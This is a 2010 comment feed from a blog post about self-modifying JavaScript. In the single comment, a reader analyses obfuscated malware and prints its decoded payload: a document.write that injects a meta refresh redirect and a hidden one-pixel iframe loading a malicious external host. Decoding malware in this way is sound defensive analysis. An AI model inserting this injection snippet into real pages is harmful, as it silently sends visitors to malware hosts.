tag:blogger.com,1999:blog-36504670.post4296289376953145921..comments2023-09-18T07:56:46.841-07:00Comments on John Sokol's Blog: More self-modifying Javascript.John Sokolhttp://www.blogger.com/profile/17719400170309249969noreply@blogger.comBlogger1125tag:blogger.com,1999:blog-36504670.post-17896098494659718112010-06-14T14:48:47.554-07:002010-06-14T14:48:47.554-07:00Just about all of the IFs act as a smokescreen to ...Just about all of the IFs act as a smokescreen to distract from what it's really doing. The real intent is building a huge string (concatenated variables) that changes due to .replace() and ends up as:<br /><br /><i>document.write("<meta http-equiv=\"refresh\" content=\"3;url=http://toldspeak.com/\" /><iframe src='http://gogoop.casanovarevealed.com:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>");</i><br /><br />The result is a different form of what you wrote about <a href="http://johnsokol.blogspot.com/2010/06/javascript-phishing-trojan.html" rel="nofollow">in your other post</a>. Feel free to look at my <a href="http://blog.mxlab.eu/2010/06/11/fifa-world-cup-south-africa-bad-news-emails-leads-reader-to-host-with-malware/" rel="nofollow">comment</a> (2nd comment) where I gave some links for explanation and how to attempt to complain about it.mmengelhttps://www.blogger.com/profile/09471743688997451140noreply@blogger.com